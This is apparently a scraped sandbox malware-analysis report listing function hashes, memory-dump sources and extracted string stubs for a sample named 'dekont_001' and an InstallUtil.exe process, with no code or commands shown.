Instruction ID: 6794bd24d0d1e75923d8935ffc390563895ce2eb0b96d7fb069e83a0f05f5cc1
Opcode Fuzzy Hash: 4d8bd92e75e82a12da4c9fce79714a52260157fdf72aa54ca3e370ffc758b4a1
Instruction Fuzzy Hash: 7BE0C278908208EBD704EFD8E9409BCBBB9EB85314F20D0ADD80D13340CA315E42DB90

Function 05E81528 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97137002deb748acb6a38d566248c0dd6dfcf362120260464729a7f69d8371c4
Instruction ID: f11287d7a9ab40de82f12595f6f9ec3519a3d24d2e8e1e9b8363e512e3b5458a
Opcode Fuzzy Hash: 97137002deb748acb6a38d566248c0dd6dfcf362120260464729a7f69d8371c4
Instruction Fuzzy Hash: 4AE02BB044120CEFC785FFF4D80069F77FAEB05210F0090A5D409D3150EE324A00DBA2

Function 075CB620 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ea1f2d0e5710465b7364c77dc13d800126a0a8193ea862136fe7d90ad74f61
Instruction ID: 573ea6ed4cf4fb9c193decda5e1928cb41800715b3a2bcde14c5f3b5307d8d3c
Opcode Fuzzy Hash: a3ea1f2d0e5710465b7364c77dc13d800126a0a8193ea862136fe7d90ad74f61
Instruction Fuzzy Hash: 2CE05BF154120CEFC745FFF9D90469FB7F9EB45220F0055A9D40597190EE325A409FA6

Function 075CE280 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e754783b1d9d399b74cc28b9de53b272744257c1eeae578145027b4f57f6b7dc
Instruction ID: cef2827f99184d1440641b79aac02018187c205b36a788b2ea48958b1025dfce
Opcode Fuzzy Hash: e754783b1d9d399b74cc28b9de53b272744257c1eeae578145027b4f57f6b7dc
Instruction Fuzzy Hash: E3E08CB4908208EFC704EFD8E8456ACBBB4EB46300F10A0ADD80813340CA325E42DB80

Function 05E81868 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7966abc018af6da96419f68b7b0bd7cee0bd4bc105031894d2d6f9f0cc3ee2
Instruction ID: 6983c4c56edcb65aee0446be5964a7fb281d628cbb45762dcbab95c55a405585
Opcode Fuzzy Hash: 2e7966abc018af6da96419f68b7b0bd7cee0bd4bc105031894d2d6f9f0cc3ee2
Instruction Fuzzy Hash: 01E0C230908208EFC788EBE8D8022BCBFF5EB05205F1080E9D89C53381DA319F42CB80

Function 01180950 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694a24be989c52c89f5528cf99fe8ee7885b8d895b3f274cc86b57bb76919ee8
Instruction ID: c3dd8b062a021935db4ba444d234a5c4048e2594ef2cd58267628a9f19d7d23f
Opcode Fuzzy Hash: 694a24be989c52c89f5528cf99fe8ee7885b8d895b3f274cc86b57bb76919ee8
Instruction Fuzzy Hash: 5CD05E30A0020DEFCB04EFB8EA0555DBBFDFB48204B1085A9D408E7308EB316F109B95

Function 0118CFD0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a1be6719b57780fdf512ec3397ed72465f4ffc95279a8a47b410850a1ece25
Instruction ID: f7f41d9edaaa5e01d6b6c76b72cb28ad43e17f8be1a279a5c7869b6c34374fda
Opcode Fuzzy Hash: 69a1be6719b57780fdf512ec3397ed72465f4ffc95279a8a47b410850a1ece25
Instruction Fuzzy Hash: A2C08C2004A70887F2DC32DE680C7B23A9CA302625F00E410B60C400524B605880CEA2

Function 0118D028 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f6e574f5fc001573eb07d25430d164b8002481649dd43633ba4e489c1a97749
Instruction ID: acdc223d249702cee1d33fa35d21e5e03b5d0ca3cb01047d237b69a9cdea36a2
Opcode Fuzzy Hash: 7f6e574f5fc001573eb07d25430d164b8002481649dd43633ba4e489c1a97749
Instruction Fuzzy Hash: 63C08C700047048BF6983FEDF80C3A97BA8EB02312F089024F21D508A48FB00081CF36

Function 01180841 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10fb2720970077495ad62dfbc271e7e4791dc2465e1b31887e1ba5f86a19e19e
Instruction ID: 2bc1a1b4c89dc06f7807965a1d4fa53ab8f29b2ce35abea0cc85572dfd176be9
Opcode Fuzzy Hash: 10fb2720970077495ad62dfbc271e7e4791dc2465e1b31887e1ba5f86a19e19e
Instruction Fuzzy Hash: D9C04C3044A2858FCB56877499588947FB0AD5235030641D6D491CA47AD6541989CF12

Non-executed Functions

Function 011891B9 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0118927F
4'^q, xrefs: 011892AA

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 2e066beb2c6801185f322d160e63f3619536cbe1ef57ee99a8e2b4e950ab5486
Instruction ID: 578131841e4fcdd06d36a57cf23db6fe60d9cd6f5b295078f11ea15f2a41ea0d
Opcode Fuzzy Hash: 2e066beb2c6801185f322d160e63f3619536cbe1ef57ee99a8e2b4e950ab5486
Instruction Fuzzy Hash: D371F874E006198FD70CEF6BE98469EBBF3BB89304F14C539D014AB2ACEB7459468B51

Function 011891C8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0118927F
4'^q, xrefs: 011892AA

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 00791fac30d547b9860519ef08237802cd1fcb08060ce37a33a915deafd99827
Instruction ID: 5a678213835a0e02ad33bb478dc7a7ac9818bc72974d9670a9106f495245baaa
Opcode Fuzzy Hash: 00791fac30d547b9860519ef08237802cd1fcb08060ce37a33a915deafd99827
Instruction Fuzzy Hash: 8871D674E006198FD70CEF6BE98469EBBF3BB89304F14C539D014AB2ACEB7459468B51

Function 05E36E5B Relevance: 1.6, Instructions: 1600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction ID: 78a293d104cd6e2797fd21d21edbbe69543b7522044b160e955f66c244baacd1
Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction Fuzzy Hash: 28C2AEA240E3C25FD7138B749DBAAE17FB1EE2321471E14DBD4C18F063E2185A5AD762

Function 05E81060 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

0mTq, xrefs: 05E8115D

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID: 0mTq
API String ID: 0-1756735028
Opcode ID: 707d8924aa0634b36ab37b35e64d20dc49638d37f647704df0c01c58cc9bca16
Instruction ID: eceee9747d9f4982d9ef85610a4b00cd179b40d3d9cacac4a3d1ea95ff143890
Opcode Fuzzy Hash: 707d8924aa0634b36ab37b35e64d20dc49638d37f647704df0c01c58cc9bca16
Instruction Fuzzy Hash: C0B1F474E05218CFDB18EFAAD484BEDBBB2BB49304F10A169D45DAB345DB746886CF10

Function 05E824C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54c13c0e002f4bcff612086d39521b6ce7ac904fd988ecde972b70828ff5cf9
Instruction ID: d91fb4bc4511e290469e8a568a87092f169a6fa01022ad09f48bbe1d825901a1
Opcode Fuzzy Hash: a54c13c0e002f4bcff612086d39521b6ce7ac904fd988ecde972b70828ff5cf9
Instruction Fuzzy Hash: A5C14378E04218CFDB14EFAAC854BEDBBF2BB49304F109169D55DAB294DB70598ACF01

Function 075CE2C0 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffdba0041997264eca515f7f00167e7a62d5936e4a64664c2478c05f2a0c8e3
Instruction ID: 2685feff65e827965f30c60d4155f0733d8be6046cbeb3c1fb454f17f82700cf
Opcode Fuzzy Hash: 5ffdba0041997264eca515f7f00167e7a62d5936e4a64664c2478c05f2a0c8e3
Instruction Fuzzy Hash: 998129B0E14218CFDB64DFA9C9857DDBBB1BF4A304F1094AEC009AB241DB74A985CF01

Function 075B0006 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81782754099bee404b3bca6dfc27c2a1023f5413a83281b5bd43f202c3593029
Instruction ID: bd10be1a8af2dbd9a517be7fe895cb84b1b357c1dcbcf346caccfe77098d1365
Opcode Fuzzy Hash: 81782754099bee404b3bca6dfc27c2a1023f5413a83281b5bd43f202c3593029
Instruction Fuzzy Hash: 653160B1D0A7558FE72ACF26CC146DABBF6BF85200F04C1FAC448AB256D7300A868F11

Function 01189860 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62857d64404d6e6b4e81a7f481c77a18c8860227dc1cf164e74bac4f1ebfbe5d
Instruction ID: 2ef45aaa0d315749887ca7ecf33db5087475f1d453294de17a25bce84b66ad04
Opcode Fuzzy Hash: 62857d64404d6e6b4e81a7f481c77a18c8860227dc1cf164e74bac4f1ebfbe5d
Instruction Fuzzy Hash: 923175B1E056188BEB58DF5BC94478EFAF7BFC9304F04C1A9C40CAA268EB7409458F51

Function 01189850 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c79daeb2cd5aba4c0685fdfe98218547cb2340760651eb82369b9833db534a
Instruction ID: 04d4b4d4f5165fd1323b9ce90b0c3f2c55ef75ea2284df54d499a5c0cf5489d2
Opcode Fuzzy Hash: 14c79daeb2cd5aba4c0685fdfe98218547cb2340760651eb82369b9833db534a
Instruction Fuzzy Hash: A43195B1D016188BEB68DF5BC94578AFAF7AFC8304F04C1A9D40CAA268EB740A458F51

Function 075B0040 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b0b0f5e4af3e816f7c8e1a4d852acace91db2cf35f28b3a1de7550dfca3146
Instruction ID: 2f60c3d1e665464fd460367a7025f85824e1242ec5540078973df8694ecd7d70
Opcode Fuzzy Hash: f3b0b0f5e4af3e816f7c8e1a4d852acace91db2cf35f28b3a1de7550dfca3146
Instruction Fuzzy Hash: D121DBB1D156198BEB28CF6BD8147DAFAF7BBC8200F04C1BA940CA6255EB300A859E40

Analysis Process: InstallUtil.exePID: 732, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Executed Functions

Function 00F8BAC0 Relevance: 9.0, Strings: 7, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00F8BA37
LjAp, xrefs: 00F8BC9F
PH^q, xrefs: 00F8BD17
LjAp, xrefs: 00F8BCB5
0oAp, xrefs: 00F8BB32
PH^q, xrefs: 00F8BA48
PH^q, xrefs: 00F8BD28

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q
API String ID: 0-1018772655
Opcode ID: 6b1cbbf3d86e1e84a6f41b355af8cc13eacc8320e0aa605caeb48b24584b7dd5
Instruction ID: 02c20929a2cf850c95a35a32b0f4a7e19f0f191006b87f86c53128f29988e8af
Opcode Fuzzy Hash: 6b1cbbf3d86e1e84a6f41b355af8cc13eacc8320e0aa605caeb48b24584b7dd5
Instruction Fuzzy Hash: 8C91D574E00218DFDB18EFA9D994A9DBBF2BF89310F14C469E809AB365DB349941DF10

Function 00F8BDA0 Relevance: 9.0, Strings: 7, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 00F8BE12
PH^q, xrefs: 00F8C008
PH^q, xrefs: 00F8BD17
LjAp, xrefs: 00F8BF7F
LjAp, xrefs: 00F8BF95
PH^q, xrefs: 00F8BFF7
PH^q, xrefs: 00F8BD28

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q
API String ID: 0-1018772655
Opcode ID: bb710924ace6f8020943f73e08afcf93e8b1b135654ab107e9a371fdaaa461fd
Instruction ID: 50876db34c10292b07a23a90a4a90242a77f3cf16e0f8b3b70d436970c3425f3
Opcode Fuzzy Hash: bb710924ace6f8020943f73e08afcf93e8b1b135654ab107e9a371fdaaa461fd
Instruction Fuzzy Hash: 3B91F374E00218DFDB14DFAAD984ADDBBF2BF89300F248469E909AB365DB349945DF10

Function 00F8B7E3 Relevance: 7.7, Strings: 6, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 00F8B852
PH^q, xrefs: 00F8BA37
LjAp, xrefs: 00F8B9BF
PH^q, xrefs: 00F8B768
LjAp, xrefs: 00F8B9D5
PH^q, xrefs: 00F8BA48

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q$PH^q
API String ID: 0-867364564
Opcode ID: d8933b923aefe551282a93e8080f29f981f5e9189b907864660642a016137edc
Instruction ID: 86e76c334c928b5966fbb507d419d9d5a5db42314cac9f961670f268b1b84ae7
Opcode Fuzzy Hash: d8933b923aefe551282a93e8080f29f981f5e9189b907864660642a016137edc
Instruction Fuzzy Hash: 3F91E574E00218CFDB14DFAAD994ADDBBF2BF89310F148469E809AB365DB349946DF10

Function 00F846DF Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 00F8474A
PH^q, xrefs: 00F84941
PH^q, xrefs: 00F84930
LjAp, xrefs: 00F848B8
LjAp, xrefs: 00F848CE

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 82ba2851bbc53f340460b0e63e63483f771f95097d40d1d81078981915297202
Instruction ID: 03bfe6b95730c7753c4a25251725106fe8e4c9291fb242579e9ff909a887c162
Opcode Fuzzy Hash: 82ba2851bbc53f340460b0e63e63483f771f95097d40d1d81078981915297202
Instruction Fuzzy Hash: 1681E574E00258DFDB14DFA9D984A9DBBF2BF88310F14C069E819AB365DB34A945DF10

Function 00F8CA41 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00F8CC97
0oAp, xrefs: 00F8CAB2
LjAp, xrefs: 00F8CC35
LjAp, xrefs: 00F8CC1F
PH^q, xrefs: 00F8CCA8

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 570910e9e82e867df71b045f41431a1c000c50bbc31681ac5da9087683ebfed9
Instruction ID: 7633c6e2a425547ad0b71ff76f50d8b1a93cad4dc80b9a8e12c4d1aad30b4a8c
Opcode Fuzzy Hash: 570910e9e82e867df71b045f41431a1c000c50bbc31681ac5da9087683ebfed9
Instruction Fuzzy Hash: E981E374E00218CFDB14DFAAD884A9DBBF2BF89310F14C069E809AB365DB349981DF50

Function 00F8B507 Relevance: 6.4, Strings: 5, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 00F8B572
LjAp, xrefs: 00F8B6F5
PH^q, xrefs: 00F8B757
LjAp, xrefs: 00F8B6DF
PH^q, xrefs: 00F8B768

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: f6e09abf635479f1ba44d8739732bd6e84294e0c4d8d4bc775fa66240096ad8e
Instruction ID: 10a4dc93af1686e0cafe573e608183b76c598f5cf3f42b9e62179f9badc1d03b
Opcode Fuzzy Hash: f6e09abf635479f1ba44d8739732bd6e84294e0c4d8d4bc775fa66240096ad8e
Instruction Fuzzy Hash: 7C81B574E00218DFDB14DFAAD984A9DBBF2BF88310F14C069E809AB365EB359941DF50

Function 00F8C08B Relevance: 6.4, Strings: 5, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00F8C2E8
PH^q, xrefs: 00F8C2D7
LjAp, xrefs: 00F8C25F
0oAp, xrefs: 00F8C0F2
LjAp, xrefs: 00F8C275

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 9886bc12317e6ce5ad48d7eed36717f305a40e83192de47bc3adf084dab7221c
Instruction ID: a6e5e2f766c3ea8a794bd7b83c21b6a86c0085c7bab8534373d2c405d2628031
Opcode Fuzzy Hash: 9886bc12317e6ce5ad48d7eed36717f305a40e83192de47bc3adf084dab7221c
Instruction Fuzzy Hash: D081B574E00218DFDB14DFAAD994A9DBBF2BF88310F14C069E809AB365DB349941DF50

Function 00F8C76B Relevance: 6.4, Strings: 5, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00F8C9C8
PH^q, xrefs: 00F8C9B7
LjAp, xrefs: 00F8C955
LjAp, xrefs: 00F8C93F
0oAp, xrefs: 00F8C7D2

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 68c24753e45d4257411e277915b01b03eef483f3eced08f86226901e9ccc6dcf
Instruction ID: b874e1991534ca07ab50816ce0f68a67d120b2eac0ae35b2351a7a2205ab0bd8
Opcode Fuzzy Hash: 68c24753e45d4257411e277915b01b03eef483f3eced08f86226901e9ccc6dcf
Instruction Fuzzy Hash: B081B274E00218DFDB14DFAAD984A9DBBF2BF88310F14C069E809AB365DB359981DF50

Function 00F86898 Relevance: 5.3, Strings: 4, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 00F86992
,bq, xrefs: 00F86A0A
,bq, xrefs: 00F86A18
(o^q, xrefs: 00F869A0

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: eb528938abd4bf32fec56459cc18af63707f1e7373f00af9cef7819ab6a9fa2e
Instruction ID: 3bad001bf0ee666dfe028dae6c9e2ed8edde0a81f09aba3fa21e4293dfa58405
Opcode Fuzzy Hash: eb528938abd4bf32fec56459cc18af63707f1e7373f00af9cef7819ab6a9fa2e
Instruction Fuzzy Hash: 5BD14631E002199FCB14EFA9D988AEDBBB2FF89355F258165E445EB2A0D730EC41DB50

Function 00F86120 Relevance: 3.0, Strings: 2, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 00F86526
(o^q, xrefs: 00F8665A

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: caaa941d769df3ef2ca0c360bebaa81b60ca6216c0430d0ef587ab56e2d4b9b9
Instruction ID: e728a498964658419db4a2b6d67bde51d1410ae8e58a0580f0442b9f489bdd31
Opcode Fuzzy Hash: caaa941d769df3ef2ca0c360bebaa81b60ca6216c0430d0ef587ab56e2d4b9b9
Instruction Fuzzy Hash: B4128D71E002189FCB14EF69C854AAEBBF6BF88314F248569E409EB391DF349D45DB90

Function 06678C51 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06678E9A
PH^q, xrefs: 06678EAB

Memory Dump Source

Source File: 00000001.00000002.2940803733.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_InstallUtil.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 359e6d87d6973a9f44ad38e3dd818b1606e05b1de837d2f1291f18c6b86b1206
Instruction ID: 38c6d0e70840577270e8072069d5285c4f1561a5ad625211ddf9eada6b22a773
Opcode Fuzzy Hash: 359e6d87d6973a9f44ad38e3dd818b1606e05b1de837d2f1291f18c6b86b1206
Instruction Fuzzy Hash: CE81B174E00218CFDB58DFA9D998AADBBF2BF89300F20816AD419AB354DB745945CF50

Function 06647D90 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2940289640.0000000006640000.00000040.00000800.00020000.00000000.sdmp, Offset: 06640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6640000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925e4672556d346190500cae196690074ca1e61b773b332b4d061ff2f98d2189
Instruction ID: 9fd6df9ac3f1829d300ebd2a240cb4449e624e00b8e6693d5e1017092e6d754f
Opcode Fuzzy Hash: 925e4672556d346190500cae196690074ca1e61b773b332b4d061ff2f98d2189
Instruction Fuzzy Hash: 21F1E374E01218CFDB54DFA9D884B9DBBB2BF88304F14C1A9E808AB355DB74A985CF50

Function 066711A0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2940803733.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99d378f5a9b339fabba88414ffd1ca99db4a6a975c782d70c4c6ba09f1a00c0
Instruction ID: 643670e053e863a8682c68bae41497857b862e2e58dff1c42389611c701bdbf0
Opcode Fuzzy Hash: d99d378f5a9b339fabba88414ffd1ca99db4a6a975c782d70c4c6ba09f1a00c0
Instruction Fuzzy Hash: 2D828D74E012288FDB64DF69D994BDDBBB2BB89300F1481EA940DA7365DB315E85CF40

Function 00F8F01F Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2931711899.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70bcc8c88f5df95e3690bbf86dbe37d981a44af7a29480dd83063d38d9defc68
Instruction ID: 4ddcb97160c6a1ef4c65e7c7c4fbfaea5400e6a84f243897865bee2facf32002
